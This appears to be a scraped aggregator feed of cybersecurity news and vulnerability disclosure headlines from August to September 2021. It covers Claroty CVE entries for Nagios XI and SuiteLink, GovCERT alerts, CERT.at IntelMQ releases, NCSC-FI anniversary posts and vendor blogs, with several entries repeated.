CWE-200: Exposure of Sensitive Information to an Unauthorized Actor Successful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37190
CVE-2021-37183
2021-09-14T00:00:00Z | 1631577600

CWE-284:Improper Access ControlSuccessful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37183
CVE-2021-37177
2021-09-14T00:00:00Z | 1631577600

CWE-471: Modification of Assumed-Immutable Data (MAID)Successful exploitation of these vulnerabilities could allow an unauthorized remote attacker to retrieve or manipulate sensitive information from the affected software. In addition, the attacker could also cause a denial-of-service condition in devices controlled by the affected software.

https://claroty.com/team82/disclosure-dashboard/cve-2021-37177
IntelMQ 3.0.2 improves the performance of high-load data collection
2021-09-13T07:02:03Z | 1631516523

Shortly after the 3.0.1 release, an IntelMQ user reported general performance issues, which we investigated over the following days. We identified two causes for them at the heart of IntelMQ: As it turned out, they just affected the data feed-collection components "collectors" with high load (streaming data or just a few big reports were not a problem) or those which use threading (receiving API collector and STOMP collector). Due to the nature of these bugs they were imminent only in bigger and/or more complex setups. Both issues stemmed from complex overhauls in IntelMQ's core in IntelMQ 3.0. The new version 3.0.2 was released last Friday, September 10th, and is available on GitHub, PyPI, in the deb/rpm repositories and on DockerHub. This blog post is part of a series of blog posts related to our 2020-AT-IA-0254 project, which also support our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/9/intelmq-302-improves-the-performance-of-high-load-data-collection
Nitro Pro PDF JavaScript document.flattenPages JSStackFrame stack-based use-after-free vulnerability
2021-09-13T00:00:00Z | 1631491200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1267
Ask-me-Anything: How SASE Fits F500?
2021-09-12T09:46:24Z | 1631439984

The post Ask-me-Anything: How SASE Fits F500? appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-91
CERT-FI 20 years: Remember when servers were metal, not clouds, and Snowden shook the world?
2021-09-10T12:24:49Z | 1631276689

The wonderland of the World Wide Web was shaking during the first decade of the new millennium. The Internet of Things was still sci-fi and the Conficker worm ate its way through the web. Around the same time, Edward Snowden stopped the press all over the world by leaking information and got us all to think about information security and secure communications. This time, we are joined by Executive Vice President Asta Sihvonen-Punkka from Fingrid Oyj and Deputy Director-General Sauli Pahlman from the National Cyber Security Centre Finland, who share their memories about CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-remember-when-servers-were-metal-not-clouds-and-snowden-shook-world
CERT-FI 20 years: Remember when servers were metal, not clouds, and Snowden shook the world?
2021-09-10T12:24:49Z | 1631276689

The wonderland of the World Wide Web was shaking during the first decade of the new millennium. The Internet of Things was still sci-fi and the Conficker worm ate its way through the web. Around the same time, Edward Snowden stopped the press all over the world by leaking information and got us all to think about information security and secure communications. This time, we are joined by Executive Vice President Asta Sihvonen-Punkka from Fingrid Oyj and Deputy Director-General Sauli Pahlman from the National Cyber Security Centre Finland, who share their memories about CERT-FI.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-remember-when-servers-were-metal-not-clouds-and-snowden-shook-world
CERT-FI 20 years: The role of a cyber security specialist gives and takes – sometimes it is good to pause and have a think
2021-09-10T12:21:33Z | 1631276493

This time we are looking back on CERT times through the lens of decades of experience. The work of an incident response duty officer is highly independent and involves a lot of responsibility. Even if cyber winds turn into a gale, security professionals must be able to make quick decisions, no matter how big the issue. Good stress management skills are vital. With us to reminisce are Jarna Hartikainen, business continuity manager at the Finnish National Emergency Supply Agency, and security consultants Erika Suortti-Myyry from Nixu Corporation and Sami Orasaari from SSVP Finland Oy.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-role-cyber-security-specialist-gives-and-takes-sometimes-it-good-pause-and
CERT-FI 20 years: The role of a cyber security specialist gives and takes – sometimes it is good to pause and have a think
2021-09-10T12:21:33Z | 1631276493

This time we are looking back on CERT times through the lens of decades of experience. The work of an incident response duty officer is highly independent and involves a lot of responsibility. Even if cyber winds turn into a gale, security professionals must be able to make quick decisions, no matter how big the issue. Good stress management skills are vital. With us to reminisce are Jarna Hartikainen, business continuity manager at the Finnish National Emergency Supply Agency, and security consultants Erika Suortti-Myyry from Nixu Corporation and Sami Orasaari from SSVP Finland Oy.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-role-cyber-security-specialist-gives-and-takes-sometimes-it-good-pause-and
Security Alert (A21-09-07): Vulnerability in Microsoft Edge (Chromium-based)
2021-09-10T04:00:00Z | 1631246400

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-08): Multiple Vulnerabilities in Cisco Products
2021-09-10T04:00:00Z | 1631246400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-06): Multiple Vulnerabilities in Android
2021-09-09T04:00:00Z | 1631160000

Google has released Android Security Bulletin September 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-38410
2021-09-09T00:00:00Z | 1631145600

CWE-427 - Uncontrolled Search Path Element: The affected products are vulnerable to DLL hijacking through an uncontrolled search path element, which may allow an attacker control to one or more locations in the search path.

https://claroty.com/team82/disclosure-dashboard/cve-2021-38410
Tarkvara turvaaugu kaudu pääseti ligi Eesti riigiasutuste siseveebide sisule
2021-09-08T08:07:54Z | 1631088474

Tarkvaratootja Atlassian teatas 25. augustil, et nende Confluence Server ja Data Center tarkvarades on kriitiline turvaauk, mis võimaldab ründajal neisse kaugelt pääseda. RIA kontroll avastas mitu Eesti riigiasutust, kes polnud tarkvara uuendanud. Neist osa andsid teada, et Confluence'i pääseti ligi.

https://ria.ee/uudised/tarkvara-turvaaugu-kaudu-paaseti-ligi-eesti-riigiasutuste-siseveebide-sisule
Jest Mocks?Unit Testing for EdgeWorkers
2021-09-08T07:00:00Z | 1631084400

In case you haven?t already been working with EdgeWorkers, it allows you to run JavaScript code across more than 4,200 locations for proximity to users and fast application response times. With more and more application functionality moving to the edge, it?s increasingly important to ensure that each function is doing what it needs to do. A unit test runs code over each segment of your program, checking the input and output. These tests allow developers to check individual areas of a program to see where (and why) errors are occurring. Several frameworks allow you to easily run your tests, including popular frameworks like Jest, Mocha, Jasmine, and Cypress.

https://www.akamai.com/blog/developers/jest-mocks-unit-testing-for-edgeworkers
High Threat Security Alert (A21-09-04): Vulnerability in Microsoft Windows
2021-09-08T04:00:00Z | 1631073600

Microsoft released a security update advisory about a remote code execution vulnerability in MSHTML that affects Microsoft Windows.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-05): Multiple Vulnerabilities in Firefox
2021-09-08T04:00:00Z | 1631073600

Mozilla has published the advisories (MFSA2021-38, MFSA2021-39 and MFSA2021-40) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-09-03): Multiple Vulnerabilities in Bluetooth devices
2021-09-07T04:00:00Z | 1630987200

Multiple vulnerabilities, collectively known as BrakTooth, are found in the implementation of Bluetooth SoC boards from multiple vendors.

https://www.govcert.gov.hk/en/alerts_detail.php
Holiday Readiness, Part Two: What you Should be Thinking About Three Months Out?Capacity Planning
2021-09-07T04:00:00Z | 1630987200

Welcome back to the Holiday Readiness blog series. We hope part one has kept you busy over the past month as you continue to improve your security posture. If you haven?t finished all of the security checklist items, don?t worry ? there is still time before Black Friday and Cyber Monday.

https://www.akamai.com/blog/trends/holiday-readiness--part-two--what-you-should-be-thinking-about-t
Ribbonsoft dxflib DL_Dxf::handleLWPolylineData heap-based buffer overflow vulnerability
2021-09-07T00:00:00Z | 1630972800

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1346
Security Alert (A21-09-02): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2021-09-03T04:00:00Z | 1630641600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
IntelMQ 3.0.1 release
2021-09-02T16:17:38Z | 1630599458

During the development of the next feature release IntelMQ 3.1.0, we corrected some issues that were found in the IntelMQ 3.0.0 release together with the IntelMQ community. We release new versions of IntelMQ, the IntelMQ API and the graphical user-interface IntelMQ Manager. The upgrade-instructions can be found in the documentation. An important upgrade hint is also in the release announcement. Summary of changes Several fixes related to IEP01 implementation (change of the configuration file format and refactoring of internal parameter handling) The feed MalwareDomains is obsolete and was removed Numerous fixes to the ShadowServer-Parser, including support for these new reports: Vulnerable SMTP Server Microsoft Sinkhole Events Report & Microsoft Sinkhole HTTP Events Report Honeypot HTTP Scan Heavy refactoring of IntelMQ-Manager's JavaScript parts to fix errors and usability issues. Various smaller fixes. A detailed list of all changes can be read in the release notes: IntelMQ 3.0.1 IntelMQ API 3.0.1 IntelMQ Manager 3.0.1 The full documentation can be found at intelmq.readthedocs.io. Acknowledgements Thanks to all the contributors (in alphabetic order): abr4xc Alex Kaplan Birger Schacht (CERT.at) Mikk Margus Möll (CERT.ee) Sebastian Wagner (CERT.at) Sebastian Waldbauer (CERT.at) Every contribution is very appreciated. Feel free to ask questions, reports issues or merge your code into the IntelMQ universe. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 and 2020-AT-IA-0254 projects, which also support our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/9/intelmq-301-release
Understanding Managed Detection and Response: What is MDR?
2021-09-02T13:49:23Z | 1630590563

Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected... The post Understanding Managed Detection and Response: What is MDR? appeared first on Cato Networks.

https://www.catonetworks.com/blog/understanding-managed-detection-and-response-what-is-mdr/
The Branch of One: Designing Your Network for the WFH Era
2021-09-02T13:07:21Z | 1630588041

For decades, the campus, branch, office, and store formed the business center of the organization. Working from anywhere is challenging that paradigm. Is the home becoming a branch of one, and what does the future hold for the traditional branch, the work home for the many? Network architects are used to building networking and security... The post The Branch of One: Designing Your Network for the WFH Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-branch-of-one-designing-your-network-for-the-wfh-era/
The Benefits of Managed Detection and Response (MDR)
2021-09-02T12:49:56Z | 1630586996

Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response. What is MDR? In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in... The post The Benefits of Managed Detection and Response (MDR) appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-benefits-of-managed-detection-and-response-mdr/
26 Cybersecurity Acronyms and Abbreviations You Should Get to Know
2021-09-02T12:32:05Z | 1630585925

We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape. SASE Secure Access Service Edge (SASE) is a cloud-based solution that converges network and... The post 26 Cybersecurity Acronyms and Abbreviations You Should Get to Know appeared first on Cato Networks.

https://www.catonetworks.com/blog/26-cybersecurity-acronyms-and-abbreviations-you-should-get-to-know/
Does Your Backbone Have Your Back?
2021-09-02T12:11:52Z | 1630584712

Private backbone services are all the rage these days. Google’s recent announcement of the GCP Network Connectivity Center (NCC) joins other similar services such as Amazon’s AWS Transit Gateway and Microsoft’s Azure Virtual WAN. Private backbones enable high quality connections that don’t rely on the public Internet. There are no performance guarantees in the public... The post Does Your Backbone Have Your Back? appeared first on Cato Networks.

https://www.catonetworks.com/blog/does-your-backbone-have-your-back/
Tuency - Constituency Portal for CERTs
2021-09-02T09:37:18Z | 1630575438

The new Constituency Portal "Tuency" was designed by CERT.at and the development has been delegated to the software development company Intevation. Tuency's web portal allows you to manage your constituency members who then can manage their relevant data themselves. This is important, for example, if IP subnets or email addresses change. Highlights In order to be future-proof and use production-ready software, Tuency ships with field-tested components. Name Description Laravel Used as PHP Framework Composer Used as PHP package manager Vue.JS Used for a single-page-application (SPA) frontend, yarn as package manager KeyCloak As authentication service Docker (optional) For containerized usage in your deployment PostgreSQL Used as database Customer-Relationship-Management (CRM) In Tuency, an organization administrator can create suborganizations, which in turn can also have their own administrator. In each organization, multiple users can be created, who can then manage the associated organization. Organizations are subject to a tree-like hierarchy. Tagging Individual tags can be set for each user, user group or organisation to represent users or organisations' memberships or attributes. The export functions can filter by these tags. Self-Management An organization administrator can claim network objects, for example Domains, Sub-Domains, IP address blocks, single IP addresses or RIPE Organisation handles. The claimed network objects are displayed in a tree-like structure to show the fine granularity of the claimed blocks. For network objects rules for security incident notifications can be configured and the network object can be associated with an abuse-contact. API Tuency itself offers a rich API to query the correct abuse-contact for a given network object (ASN, IP-Address, Domain) and supports hierarchical inheritance and notification rules! IntelMQ is able to communicate with the API through an expert (IntelMQ "bot"). Keycloak Keycloak is used as identity and access management provider. It's open source and is widely used as a single sign-on solution. It uses standard protocols like OAuth 2.0, OpenID Connect and SAML 2.0 and also integrates with existing LDAP or Active Directory services. The Tuency source code and documentation can be found in Tuency's source-code repository. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 and 2020-AT-IA-0254 and projects, which also support our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/9/tuency-constituency-portal-for-iocs-and-certs
Zero Trust: Is it right for me?
2021-09-02T08:38:13Z | 1630571893

The first in a series of blogs to ease your journey towards a zero trust architecture.

https://www.ncsc.gov.uk/blog-post/zero-trust-is-it-right-for-me
SASE Expert Advanced Certification
2021-09-01T12:11:02Z | 1630498262

The post SASE Expert Advanced Certification appeared first on Cato Networks.

https://www.catonetworks.com/sase/sase-expert-level-2/
Eliminate Threat Intelligence False Positives with SASE
2021-09-01T09:04:43Z | 1630487083

The post Eliminate Threat Intelligence False Positives with SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase/
Passwords ? Extinction Event Looming?
2021-09-01T07:00:00Z | 1630479600

Passwords are the bane of users and security teams? lives. Despite years of security teams educating users about not using 123456 as a password, not recycling passwords across multiple personal and professional accounts, and implementing even more rigorous password rules and investments in password manager tools, these combinations of letters, numbers, and special characters remain a rich target for attackers.

https://www.akamai.com/blog/security/passwords---extinction-event-looming-
Security Alert (A21-09-01): Multiple Vulnerabilities in Google Chrome
2021-09-01T04:00:00Z | 1630468800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
SASE vs SD-WAN What’s Beyond Security
2021-08-31T08:45:00Z | 1630399500

The post SASE vs SD-WAN What’s Beyond Security appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-vs-sd-wan-whats-beyond-security/
Navigating Your First Steps with a Potential SASE Vendor
2021-08-30T14:21:35Z | 1630333295

When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can... The post Navigating Your First Steps with a Potential SASE Vendor appeared first on Cato Networks.

https://www.catonetworks.com/blog/navigating-your-first-steps-with-a-potential-sase-vendor/
Strategic Roadmap for SASE: A Practical Guide
2021-08-29T09:42:48Z | 1630230168

The post Strategic Roadmap for SASE: A Practical Guide appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-77
Security Alert (A21-08-15): Multiple Vulnerabilities in Cisco Products
2021-08-27T04:00:00Z | 1630036800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-08-13): Multiple Vulnerabilities in VMware Products
2021-08-26T04:00:00Z | 1629950400

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-08-14): Multiple Vulnerabilities in F5 BIG-IP
2021-08-26T04:00:00Z | 1629950400

F5 has published security advisories to address multiple vulnerabilities in F5 devices.

https://www.govcert.gov.hk/en/alerts_detail.php
RIA registreeris juulis 111 mõjuga küberintsidenti
2021-08-25T07:44:24Z | 1629877464

Riigi infosüsteemi ameti registreeris eelmisel kuul enam kui sada mõjuga intsidenti. Neist kaks olid seotud RIA enda teenustega. Rahvusvaheliselt avaldas suurt mõju USA tarkvaraettevõtet Kaseyat tabanud rünnak.

https://ria.ee/uudised/ria-registreeris-juulis-111-mojuga-kuberintsidenti
UPX Packed Headaches
2021-08-23T04:00:00Z | 1629691200

Researching malware has many challenges. One of those challenges is obfuscated code and intentionally corrupted binaries. To address challenges like this, we've written a small tool in C that could fix intentionally corrupted binaries automatically. We also plan to open-source the project so other researchers could use it too, and perhaps improve and expand upon the tool's capabilities as needed.

https://www.akamai.com/blog/security/upx-packed-headaches
Serving up some server advice
2021-08-20T15:12:02Z | 1629472322

Highlighting guidance which will help you secure your servers

https://www.ncsc.gov.uk/blog-post/serving-up-some-server-advice
Security Alert (A21-08-11): Multiple Vulnerabilities in Cisco Products
2021-08-19T04:00:00Z | 1629345600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-08-12): Vulnerability in ISC BIND
2021-08-19T04:00:00Z | 1629345600

ISC has released a security update to fix a vulnerability in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-32999
2021-08-19T00:00:00Z | 1629331200

CWE-755: IMPROPER HANDLING OF EXCEPTIONAL CONDITIONSImproper handling of exceptional conditions in SuiteLink server while processing command 0x01

https://claroty.com/team82/disclosure-dashboard/cve-2021-32999
CVE-2021-32987
2021-08-19T00:00:00Z | 1629331200

CWE-476: NULL POINTER DEREFERENCE Null pointer dereference in SuiteLink server while processing command 0x0b

https://claroty.com/team82/disclosure-dashboard/cve-2021-32987
CVE-2021-32979
2021-08-19T00:00:00Z | 1629331200

CWE-476: NULL POINTER DEREFERENCE Null pointer dereference in SuiteLink server while processing commands 0x04/0x0a

https://claroty.com/team82/disclosure-dashboard/cve-2021-32979
CVE-2021-32971
2021-08-19T00:00:00Z | 1629331200

NULL POINTER DEREFERENCE CWE-476 Null pointer dereference in SuiteLink server while processing command 0x07

https://claroty.com/team82/disclosure-dashboard/cve-2021-32971
CVE-2021-32963
2021-08-19T00:00:00Z | 1629331200

CWE-476: NULL POINTER DEREFERENCENull pointer dereference in SuiteLink server while processing commands 0x03/0x10

https://claroty.com/team82/disclosure-dashboard/cve-2021-32963
CVE-2021-32959
2021-08-19T00:00:00Z | 1629331200

CWE-122: HEAP-BASED BUFFER OVERFLOWHeap-based buffer overflow in SuiteLink server while processing commands 0x05/0x06

https://claroty.com/team82/disclosure-dashboard/cve-2021-32959
CVE-2021-31338
2021-08-19T00:00:00Z | 1629331200

CWE-15: External Control of System or Configuration SettingAffected devices allow to modify configuration settings over an unauthenticated channel. This could allow a local attacker to escalate privileges and execute own code on the device. Read more: "All Roads Lead to OpenVPN: Pwning Industrial Remote Access Clients"

https://claroty.com/team82/disclosure-dashboard/cve-2021-31338
NCSC-NL publishes factsheet 'Prepare for Zero Trust'
2021-08-18T13:45:00Z | 1629294300

More and more organizations are applying Zero Trust principles, and the need for the implementation of these principles is increasing. Technological developments have rendered many organizations' traditional views of security and security policies obsolete. Organizations that have embraced Zero Trust principles are less susceptible to external attacks and threats from within.

https://english.ncsc.nl/latest/news/2021/august/18/ncsc-publishes-the-factsheet-prepare-for-zero-trust
No sunshine or relaxed holiday vibes in July cyber weather
2021-08-18T11:27:40Z | 1629286060

July meant summer holidays for many of us, but there was no rest in the cyber world. FluBot continued to cause trouble in Finland, and we had to reactivate our alert. Phishing campaigns to steal online banking credentials continued in July, and financial losses are already counted in millions. Several critical vulnerabilities were also detected. These should be patched as soon as possible.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-heinakuu-2021
No sunshine or relaxed holiday vibes in July cyber weather
2021-08-18T11:27:40Z | 1629286060

July meant summer holidays for many of us, but there was no rest in the cyber world. FluBot continued to cause trouble in Finland, and we had to reactivate our alert. Phishing campaigns to steal online banking credentials continued in July, and financial losses are already counted in millions. Several critical vulnerabilities were also detected. These should be patched as soon as possible.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-heinakuu-2021
CERT-FI 20 years: Build and maintain trust – key lesson for all cyber security officials
2021-08-18T11:25:14Z | 1629285914

This time, our anniversary recollections take us back to 2017 and 2018. Wannacry wormed its way through networks, and the City of Lahti IT services were in trouble. To look back on these events, we have invited Lasse Laukka, head of Product Security Operations at Ericsson, and Jarmo Lahtiranta, senior cyber security specialist at Insta Digital. Building and maintaining trust is at the core of cyber security officials’ work. And always remember page 863 of the Yle teletext service, an often forgotten but reliable source of cyber security news.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-build-and-maintain-trust-key-lesson-all-cyber-security-officials
CERT-FI 20 years: Build and maintain trust – key lesson for all cyber security officials
2021-08-18T11:25:14Z | 1629285914

This time, our anniversary recollections take us back to 2017 and 2018. Wannacry wormed its way through networks, and the City of Lahti IT services were in trouble. To look back on these events, we have invited Lasse Laukka, head of Product Security Operations at Ericsson, and Jarmo Lahtiranta, senior cyber security specialist at Insta Digital. Building and maintaining trust is at the core of cyber security officials’ work. And always remember page 863 of the Yle teletext service, an often forgotten but reliable source of cyber security news.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-build-and-maintain-trust-key-lesson-all-cyber-security-officials
CERT-FI 20 years: Oh, remember Heartbleed and NotPetya?
2021-08-18T11:21:47Z | 1629285707

CERT-FI became a part of the NCSC-FI on 1 January 2014. The year 2013 meant preparations for the establishment of the new organisation, and new information security experts were needed. That is when security specialists Antti Kurittu and Ilari Karinen entered the stage. Memorable events during their time as cyber security officials included Heartbleed and NotPetya. Currently, Kurittu leads the DFIR team at Nixu and Karinen is the director of Cyber Security Services at Elisa.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-oh-remember-heartbleed-and-notpetya
CERT-FI 20 years: Oh, remember Heartbleed and NotPetya?
2021-08-18T11:21:47Z | 1629285707

CERT-FI became a part of the NCSC-FI on 1 January 2014. The year 2013 meant preparations for the establishment of the new organisation, and new information security experts were needed. That is when security specialists Antti Kurittu and Ilari Karinen entered the stage. Memorable events during their time as cyber security officials included Heartbleed and NotPetya. Currently, Kurittu leads the DFIR team at Nixu and Karinen is the director of Cyber Security Services at Elisa.

https://www.kyberturvallisuuskeskus.fi/en/news/cert-fi-20-years-oh-remember-heartbleed-and-notpetya
Security Alert (A21-08-10): Vulnerability in Firefox
2021-08-18T04:00:00Z | 1629259200

Mozilla has published the advisory (MFSA2021-37) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Dogged Persistence?The Name of the Game for One DDoS Attacker
2021-08-18T04:00:00Z | 1629259200

With DDoS, we typically observe a moderate degree of attacker persistence. DDoS attacks are relatively easy to launch from a number of online booter services, and the availability of cryptocurrencies for payment has made it easy to remain anonymous. Attackers can try their hand at DDoS for little effort and money, and in relative safety. They give it a go, try a few things (vector, endpoint, and scale changes), and for those with effective defenses, the attacker eventually burns out.

https://www.akamai.com/blog/news/dogged-persistence-the-name-of-the-game-for-one-ddos-attacker
Nokia 8 Sirocco phones: patch released for WPA/WPA2 Enterprise network vulnerability
2021-08-17T09:58:21Z | 1629194301

The vulnerability concerns Wi-Fi authentication in an enterprise network. With certain settings, the mobile phone transmits the username and password to the RADIUS authentication server in plaintext. A patch has been released to fix the vulnerability. Users can download and install the patch on their phones.

https://www.kyberturvallisuuskeskus.fi/en/haavoittuvuus_23/2021
23 Good-To-Know Networking Acronyms and Abbreviations
2021-08-17T07:11:28Z | 1629184288

You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation. SASE SASE (Secure Access Service Edge) converges network and security functionalities into a single cloud-based solution.... The post 23 Good-To-Know Networking Acronyms and Abbreviations appeared first on Cato Networks.

https://www.catonetworks.com/blog/23-good-to-know-networking-acronyms-and-abbreviations/
Security Alert (A21-08-09): Multiple Vulnerabilities in Google Chrome
2021-08-17T04:00:00Z | 1629172800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Disc Soft Ltd Daemon Tools Pro ISO Parsing memory corruption vulnerability
2021-08-17T00:00:00Z | 1629158400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1295
CVE-2021-33025
2021-08-17T00:00:00Z | 1629158400

CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)Successful exploitation of these vulnerabilities could result in remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2021-33025
Security Alert (A21-08-08): Vulnerability in Drupal
2021-08-16T04:00:00Z | 1629086400

Drupal has released a security advisory to address a vulnerability in the CKEditor library for WYSIWYG editing.

https://www.govcert.gov.hk/en/alerts_detail.php
Tokyo Streaming Traffic Runs Rings Around Rio
2021-08-16T04:00:00Z | 1629086400

With 35 medals at stake, the last full day of competition during the games in Tokyo generated the highest video streaming traffic for 30-plus customers on the Akamai Intelligent Edge Platform. Medal matches for baseball, basketball, and soccer, along with several track and field finals, drove related traffic to 10 Tbps on Saturday, August 7.

https://www.akamai.com/blog/performance/tokyo-streaming-traffic-runs-rings-around-rio
GPAC Project on Advanced Content library MPEG-4 Decoding multiple multiplication integer overflow vulnerabilities
2021-08-16T00:00:00Z | 1629072000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1297
GPAC Project Advanced Content MPEG-4 Decoding multiple integer truncation vulnerabilities
2021-08-16T00:00:00Z | 1629072000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1298
GPAC Project Advanced Content MPEG-4 Decoding multiple integer addition overflow vulnerabilities
2021-08-16T00:00:00Z | 1629072000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1299
Attackers are Zeroing in On Trust with New Device ID Twist
2021-08-15T18:49:28Z | 1629053368

The cat-and-mouse game between threat actors and security researchers is ever-evolving. With every new threat comes a security solution that in turn triggers the threat’s evolution. It’s an ongoing process whose most recent twist in the Device ID game was documented in our just-released SASE report on enterprise security. Device ID’s Led to Spoofing-as-a-Service Device... The post Attackers are Zeroing in On Trust with New Device ID Twist appeared first on Cato Networks.

https://www.catonetworks.com/blog/attackers-are-zeroing-in-on-trust-with-new-device-id-twist/
CVE-2021-37353
2021-08-15T00:00:00Z | 1628985600

Nagios XI Docker Wizard before version 1.1.3 is vulnerable to SSRF due to improper sanitation in table_population.php Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37353
CVE-2021-37352
2021-08-15T00:00:00Z | 1628985600

An open redirect vulnerability exists in Nagios XI before version 5.8.5 that could lead to spoofing. To exploit the vulnerability, an attacker could send a link that has a specially crafted URL and convince the user to click the link. Read more: "Securing Network Management Systems: Nagios XI" Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37352
CVE-2021-37351
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to insecure permissions and allows unauthenticated users to access guarded pages through a crafted HTTP request to the server. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37351
CVE-2021-37350
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to SQL injection vulnerability in Bulk Modifications Tool due to improper input sanitization. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37350
CVE-2021-37349
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because cleaner.php does not sanitize input read from the database. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37349
CVE-2021-37348
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to local file inclusion through improper limitation of a pathname in index.php. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37348
CVE-2021-37347
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because getprofile.sh does not validate the directory name it receives as an argument. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37347
CVE-2021-37346
2021-08-15T00:00:00Z | 1628985600

Nagios XI WatchGuard Wizard before version 1.4.8 is vulnerable to remote code execution through Improper neutralisation of special elements used in an OS Command (OS Command injection). Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37346
CVE-2021-37345
2021-08-15T00:00:00Z | 1628985600

Nagios XI before version 5.8.5 is vulnerable to local privilege escalation because xi-sys.cfg is being imported from the var directory for some scripts with elevated permissions. Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37345
CVE-2021-37344
2021-08-15T00:00:00Z | 1628985600

Nagios XI Switch Wizard before version 2.5.7 is vulnerable to remote code execution through improper neutralization of special elements used in an OS Command (OS Command injection). Read more: "Securing Network Management Systems: Nagios XI"

https://claroty.com/team82/disclosure-dashboard/cve-2021-37344
CVE-2021-37343
2021-08-15T00:00:00Z | 1628985600

